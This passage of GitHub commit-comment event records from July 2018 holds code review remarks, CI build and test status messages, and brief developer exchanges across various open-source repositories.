found.)\n * Mono.Data.Tds/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * MTouch tests/NUnit: Failed (Execution failed with exit code 2)\n"}},"created_at":"2018-07-09T20:49:00Z"}
{"id":"7940020099","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647549,"position":29,"line":29,"path":"Week-08/day-04/myreddit/server.js","commit_id":"ff841549ea202a86a9d437a7ff8c922298a2df49","created_at":"2018-07-09T20:49:43Z","updated_at":"2018-07-09T20:49:43Z","author_association":"NONE","body":"By default every response has status 200."}},"created_at":"2018-07-09T20:49:43Z"}
{"id":"7940021360","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647551,"position":38,"line":38,"path":"Week-08/day-04/myreddit/server.js","commit_id":"ff841549ea202a86a9d437a7ff8c922298a2df49","created_at":"2018-07-09T20:49:59Z","updated_at":"2018-07-09T20:49:59Z","author_association":"NONE","body":"😍 "}},"created_at":"2018-07-09T20:49:59Z"}
{"id":"7940022791","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647555,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T20:50:16Z","updated_at":"2018-07-09T20:50:16Z","author_association":"MEMBER","body":"This version number is separate from the mod. It's just a separate skins resource pack."}},"created_at":"2018-07-09T20:50:16Z"}
{"id":"7940026169","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647570,"position":37,"line":37,"path":"Week-08/day-04/myreddit/server.js","commit_id":"ff841549ea202a86a9d437a7ff8c922298a2df49","created_at":"2018-07-09T20:50:55Z","updated_at":"2018-07-09T20:50:55Z","author_association":"NONE","body":"Object short✋ ✅ "}},"created_at":"2018-07-09T20:50:55Z"}
{"id":"7940026419","type":"CommitCommentEvent","actor":{"login":"Electry"},"repo":{"name":"CelesteBlue-dev/PSVita-StorageMgr"},"payload":{"comment":{"id":29647571,"position":null,"line":null,"path":null,"commit_id":"59fb2d1c126899fb6914f1c2a6935355902886b9","created_at":"2018-07-09T20:50:58Z","updated_at":"2018-07-09T20:50:58Z","author_association":"NONE","body":"Like calling ksceIoOpen() 9583459 times just to read a single config file."}},"created_at":"2018-07-09T20:50:58Z"}
{"id":"7940029034","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29647575,"position":null,"line":null,"path":null,"commit_id":"217073e15acabe0ae7b0b78e7a3ebbdaeca198b2","created_at":"2018-07-09T20:51:30Z","updated_at":"2018-07-09T20:51:30Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 54](https://teamcity.otenv.com/viewLog.html?buildId=8894109&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-09T20:51:30Z"}
{"id":"7940029447","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647576,"position":76,"line":76,"path":"Week-08/day-04/myreddit/server.js","commit_id":"ff841549ea202a86a9d437a7ff8c922298a2df49","created_at":"2018-07-09T20:51:34Z","updated_at":"2018-07-09T20:51:34Z","author_association":"NONE","body":"👌 YEAYYY!"}},"created_at":"2018-07-09T20:51:34Z"}
{"id":"7940036363","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29647590,"position":null,"line":null,"path":null,"commit_id":"2425cf8b063545075a5729db5fb194b30d4e2a98","created_at":"2018-07-09T20:52:58Z","updated_at":"2018-07-09T20:52:58Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.42.2425cf8b063545075a5729db5fb194b30d4e2a98](http://build.palaso.org/viewLog.html?buildId=124489&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:48"}},"created_at":"2018-07-09T20:52:58Z"}
{"id":"7940036925","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647592,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T20:53:06Z","updated_at":"2018-07-09T20:53:06Z","author_association":"MEMBER","body":"That version, as far as I can tell, has never been changed though. Matching to the mod's build number feels a little more informative of when and on what version the pack was generated."}},"created_at":"2018-07-09T20:53:06Z"}
{"id":"7940036926","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/hearthis"},"payload":{"comment":{"id":29647593,"position":null,"line":null,"path":null,"commit_id":"d1ec6c40978a88a3b5a016041ab73962caa3592d","created_at":"2018-07-09T20:53:06Z","updated_at":"2018-07-09T20:53:06Z","author_association":"NONE","body":"TeamCity HearThis :: HearThis pull requests [Build *.*.43.d1ec6c40978a88a3b5a016041ab73962caa3592d](http://build.palaso.org/viewLog.html?buildId=124488&buildTypeId=HearThis_HearThisPullRequests) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:56"}},"created_at":"2018-07-09T20:53:06Z"}
{"id":"7940038949","type":"CommitCommentEvent","actor":{"login":"pandameister"},"repo":{"name":"javascriptkitty/js-exercices"},"payload":{"comment":{"id":29647597,"position":null,"line":null,"path":null,"commit_id":"6e1fb91bd02abe0818cc4f93b0a32ec8d52e6d34","created_at":"2018-07-09T20:53:31Z","updated_at":"2018-07-09T20:53:31Z","author_association":"COLLABORATOR","body":"@javascriptkitty  strange it works for me .. we can take a look tomorrow"}},"created_at":"2018-07-09T20:53:31Z"}
{"id":"7940044660","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647607,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T20:54:42Z","updated_at":"2018-07-09T20:54:42Z","author_association":"MEMBER","body":"Why not just separate it in a new repo then? If it never changes, what's the use?"}},"created_at":"2018-07-09T20:54:42Z"}
{"id":"7940047668","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29647613,"position":null,"line":null,"path":null,"commit_id":"106686eaccb27ea62292fe84fd57f159fc256f63","created_at":"2018-07-09T20:55:19Z","updated_at":"2018-07-09T20:55:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-34](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T20:55:19Z"}
{"id":"7940048819","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29647617,"position":null,"line":null,"path":null,"commit_id":"217073e15acabe0ae7b0b78e7a3ebbdaeca198b2","created_at":"2018-07-09T20:55:31Z","updated_at":"2018-07-09T20:55:31Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 54](https://teamcity.otenv.com/viewLog.html?buildId=8894109&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **SUCCESS**\nSummary: Running Build time: 00:04:01"}},"created_at":"2018-07-09T20:55:31Z"}
{"id":"7940051028","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647623,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T20:55:57Z","updated_at":"2018-07-09T20:55:57Z","author_association":"MEMBER","body":"That's a good point. But don't we use the textures from this inside the main mod?"}},"created_at":"2018-07-09T20:55:57Z"}
{"id":"7940054651","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29647631,"position":null,"line":null,"path":null,"commit_id":"217073e15acabe0ae7b0b78e7a3ebbdaeca198b2","created_at":"2018-07-09T20:56:39Z","updated_at":"2018-07-09T20:56:39Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 55](https://teamcity.otenv.com/viewLog.html?buildId=8894117&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-09T20:56:39Z"}
{"id":"7940057804","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647636,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T20:57:17Z","updated_at":"2018-07-09T20:57:17Z","author_association":"MEMBER","body":"They are not used per se, but server admins can use it or a modified version to give custom skins to NPCs. I may end up replacing it in the future."}},"created_at":"2018-07-09T20:57:17Z"}
{"id":"7940058657","type":"CommitCommentEvent","actor":{"login":"Amaroq7"},"repo":{"name":"Amaroq7/SPMod"},"payload":{"comment":{"id":29647640,"position":22,"line":22,"path":"src/FloatNatives.cpp","commit_id":"f3437a99192f8572e4dc509d2eb4b1e4a9de9f89","created_at":"2018-07-09T20:57:27Z","updated_at":"2018-07-09T20:57:27Z","author_association":"OWNER","body":"Fixed in master. Thanks."}},"created_at":"2018-07-09T20:57:27Z"}
{"id":"7940062603","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29647650,"position":null,"line":null,"path":null,"commit_id":"217073e15acabe0ae7b0b78e7a3ebbdaeca198b2","created_at":"2018-07-09T20:58:15Z","updated_at":"2018-07-09T20:58:15Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 55](https://teamcity.otenv.com/viewLog.html?buildId=8894117&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:31"}},"created_at":"2018-07-09T20:58:15Z"}
{"id":"7940064319","type":"CommitCommentEvent","actor":{"login":"CryIz"},"repo":{"name":"NilanthAnimosus/Barotrauma---Nilanths-Edits"},"payload":{"comment":{"id":29647654,"position":null,"line":null,"path":null,"commit_id":"a0e4f3dfb58cfecb00823ee9972b4d5ea574fd85","created_at":"2018-07-09T20:58:36Z","updated_at":"2018-07-09T20:58:36Z","author_association":"NONE","body":"That's why you're loved."}},"created_at":"2018-07-09T20:58:36Z"}
{"id":"7940074044","type":"CommitCommentEvent","actor":{"login":"FSkay"},"repo":{"name":"mauriciomatozzo/projetoassistenciati"},"payload":{"comment":{"id":29647678,"position":44,"line":45,"path":"cadastroCliente.php","commit_id":"5fb0c838e030af2e913f44a2d2a186f5d2762f5c","created_at":"2018-07-09T21:00:31Z","updated_at":"2018-07-09T21:00:31Z","author_association":"COLLABORATOR","body":"Test"}},"created_at":"2018-07-09T21:00:31Z"}
{"id":"7940074125","type":"CommitCommentEvent","actor":{"login":"cpfeiffer"},"repo":{"name":"jonnsoft/Gadgetbridge"},"payload":{"comment":{"id":29647679,"position":6,"line":452,"path":"app/src/main/java/nodomain/freeyourgadget/gadgetbridge/activities/DiscoveryActivity.java","commit_id":"3656ed9648b28475c35764da8a5cbeb420cfc307","created_at":"2018-07-09T21:00:32Z","updated_at":"2018-07-09T21:00:32Z","author_association":"NONE","body":"I just noticed this commit. In theory it should not be necessary, but the scanning code is a little complicated, so I took the liberty and cherry-picked it. Thanks :-)"}},"created_at":"2018-07-09T21:00:32Z"}
{"id":"7940075038","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647685,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T21:00:44Z","updated_at":"2018-07-09T21:00:44Z","author_association":"MEMBER","body":"Hm... I suppose users can install it too. I rather like having the background ponies there as an option.\r\n\r\nIs it possible to split it off and make gradle roll the resources in when packaging? Essentially the opposite of what we're doing now."}},"created_at":"2018-07-09T21:00:44Z"}
{"id":"7940079415","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29647694,"position":null,"line":null,"path":null,"commit_id":"2425cf8b063545075a5729db5fb194b30d4e2a98","created_at":"2018-07-09T21:01:38Z","updated_at":"2018-07-09T21:01:38Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.728.2425cf8b063545075a5729db5fb194b30d4e2a98](http://build.palaso.org/viewLog.html?buildId=124490&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1855, ignored: 18 Build time: 00:08:37"}},"created_at":"2018-07-09T21:01:38Z"}
{"id":"7940083071","type":"CommitCommentEvent","actor":{"login":"pathawks"},"repo":{"name":"jameysharp/jekyll-feed"},"payload":{"comment":{"id":29647701,"position":null,"line":null,"path":null,"commit_id":"4f7e3cdd4e71c4075aed7ed581a22bea3331789e","created_at":"2018-07-09T21:02:24Z","updated_at":"2018-07-09T21:02:24Z","author_association":"NONE","body":"Nicely done :+1:"}},"created_at":"2018-07-09T21:02:24Z"}
{"id":"7940084316","type":"CommitCommentEvent","actor":{"login":"Uzair3830"},"repo":{"name":"Qualeams/Android-Face-Recognition-with-Deep-Learning-Test-Framework"},"payload":{"comment":{"id":29647706,"position":null,"line":null,"path":null,"commit_id":"c896aafbdd2e265a077ebbb57ea3f2b256cd3eeb","created_at":"2018-07-09T21:02:39Z","updated_at":"2018-07-09T21:02:39Z","author_association":"NONE","body":"Sir, please give me a video how to start the code of Android-Face-Recognition-with-Deep-Learning-Test-Framework step by step. We are use this app in our FYP but we are not understand how to start this app code in android studio 🤔 please help me my id is uzairrasheed608@gmail.com I am very thank full to you."}},"created_at":"2018-07-09T21:02:39Z"}
{"id":"7940085418","type":"CommitCommentEvent","actor":{"login":"evil-at-wow"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":29647708,"position":18,"line":2375,"path":"sql/scriptdev2/scriptdev2.sql","commit_id":"28e4abf66a62996a4cf00c9e54701f7f20cddf6c","created_at":"2018-07-09T21:02:53Z","updated_at":"2018-07-09T21:02:53Z","author_association":"CONTRIBUTOR","body":"> ... walk upon _the the_ ground, ...\r\n\r\nThat looks like a typo, and as far as I can see it's not in the retail string."}},"created_at":"2018-07-09T21:02:53Z"}
{"id":"7940089176","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647719,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T21:03:41Z","updated_at":"2018-07-09T21:03:41Z","author_association":"MEMBER","body":"I might add: Don't forget that the mod uses them to render other players background ponies when they have no skin."}},"created_at":"2018-07-09T21:03:41Z"}
{"id":"7940092565","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29647724,"position":17,"line":143,"path":"lib/LaTeXML/Core/Gullet.pm","commit_id":"5e552365c468a6464ca6405fe9e3cc780fe10a33","created_at":"2018-07-09T21:04:22Z","updated_at":"2018-07-09T21:04:22Z","author_association":"NONE","body":"should remove the ' ' prefix, since that will turn it into a string."}},"created_at":"2018-07-09T21:04:22Z"}
{"id":"7940101026","type":"CommitCommentEvent","actor":{"login":"Akshay-Venkatesh"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29647750,"position":19,"line":19,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_cache.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-09T21:06:12Z","updated_at":"2018-07-09T21:06:12Z","author_association":"NONE","body":"Is pgtable parameter needed?"}},"created_at":"2018-07-09T21:06:12Z"}
{"id":"7940103720","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647756,"position":51,"line":102,"path":"build.gradle","commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T21:06:45Z","updated_at":"2018-07-09T21:06:45Z","author_association":"MEMBER","body":"It's not for background ponies. It's specifically for NPCs that need a specific skin. It's my version of a feature that the old (1.6) skin server had. Verdana added a bunch of skins such as `PinkiePie!` which had pinkie pie's skin."}},"created_at":"2018-07-09T21:06:45Z"}
{"id":"7940104393","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29647758,"position":null,"line":null,"path":null,"commit_id":"c9b90b71882129d0a2ac8ec82cd8d26b97a5096d","created_at":"2018-07-09T21:06:53Z","updated_at":"2018-07-09T21:06:53Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-765](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-765).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-765-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-09T21:06:53Z"}
{"id":"7940105092","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29647759,"position":null,"line":null,"path":null,"commit_id":"fff4f1e6527af022f5b9d1ea8cb0f204018a68e9","created_at":"2018-07-09T21:07:02Z","updated_at":"2018-07-09T21:07:02Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-316](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-316).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-316-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T21:07:02Z"}
{"id":"7940110029","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29647769,"position":null,"line":null,"path":null,"commit_id":"cb79d96bdfdbf9f9f1488c99a694f842f9a71267","created_at":"2018-07-09T21:08:04Z","updated_at":"2018-07-09T21:08:04Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-36](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-36).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-36-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T21:08:04Z"}
{"id":"7940111197","type":"CommitCommentEvent","actor":{"login":"allenjstewart"},"repo":{"name":"emilyg406/UG-Summer-Research-2018"},"payload":{"comment":{"id":29647772,"position":null,"line":null,"path":null,"commit_id":"965aa8866e1dfd3bfb56d790c1b6892b376791be","created_at":"2018-07-09T21:08:19Z","updated_at":"2018-07-09T21:08:19Z","author_association":"COLLABORATOR","body":"This looks great! If you wanted to, you could adjust det2 to input general matrix and calculate the determinant."}},"created_at":"2018-07-09T21:08:19Z"}
{"id":"7940112664","type":"CommitCommentEvent","actor":{"login":"MorpeXUA"},"repo":{"name":"MorpeXUA/VRcheat"},"payload":{"comment":{"id":29647776,"position":2,"line":1,"path":"ver.txt","commit_id":"0c752d36b550de1457d66c8dd5939683869ed0d4","created_at":"2018-07-09T21:08:39Z","updated_at":"2018-07-09T21:08:39Z","author_association":"OWNER","body":"1.0.0"}},"created_at":"2018-07-09T21:08:39Z"}
{"id":"7940112946","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware"},"payload":{"comment":{"id":29647777,"position":null,"line":null,"path":null,"commit_id":"d3df06782ed4e896f2d665f96518c2c5b410a7d8","created_at":"2018-07-09T21:08:42Z","updated_at":"2018-07-09T21:08:42Z","author_association":"CONTRIBUTOR","body":"As it's a very local community-specific package, it should be prefixed with freifunk-berlin as the others"}},"created_at":"2018-07-09T21:08:42Z"}
{"id":"7940118859","type":"CommitCommentEvent","actor":{"login":"ewiseblatt"},"repo":{"name":"spinnaker/igor"},"payload":{"comment":{"id":29647792,"position":null,"line":null,"path":null,"commit_id":"7289f653337b3dba1cfeb6c5133aa5acbe2603a1","created_at":"2018-07-09T21:10:04Z","updated_at":"2018-07-09T21:10:04Z","author_association":"CONTRIBUTOR","body":"adam,\r\n\r\nI'm seeing the NaN issue here with hystrix.currentTime.\r\nImmediately on startup, I see this:\r\n        \"hystrix.currentTime\": {\r\n            \"kind\": \"Gauge\",\r\n            \"values\": [\r\n                {   \r\n                    \"tags\": [\r\n                        {\r\n                            \"key\": \"metricGroup\",\r\n                            \"value\": \"HystrixThreadPool\"\r\n                        },\r\n                        {\r\n                            \"key\": \"metricType\",\r\n                            \"value\": \"jenkins-Jenkins\"\r\n                        }\r\n                    ],\r\n                    \"values\": [\r\n                        {\r\n                            \"t\": 1531170228148,\r\n                            \"v\": \"NaN\"\r\n                        }\r\n                    ]\r\n                },\r\n\r\nThis is similar to the issue in orca last month with a version bump."}},"created_at":"2018-07-09T21:10:04Z"}
{"id":"7940120645","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29647795,"position":5,"line":53,"path":"tests/test_cli.py","commit_id":"425c7b07f4994986e0b2f362c7389b960e693934","created_at":"2018-07-09T21:10:29Z","updated_at":"2018-07-09T21:10:29Z","author_association":"MEMBER","body":"me too 😄 \r\n\r\nyou could also add `# -*- coding: UTF-8 -*-` and keep the curly apostrophe"}},"created_at":"2018-07-09T21:10:29Z"}
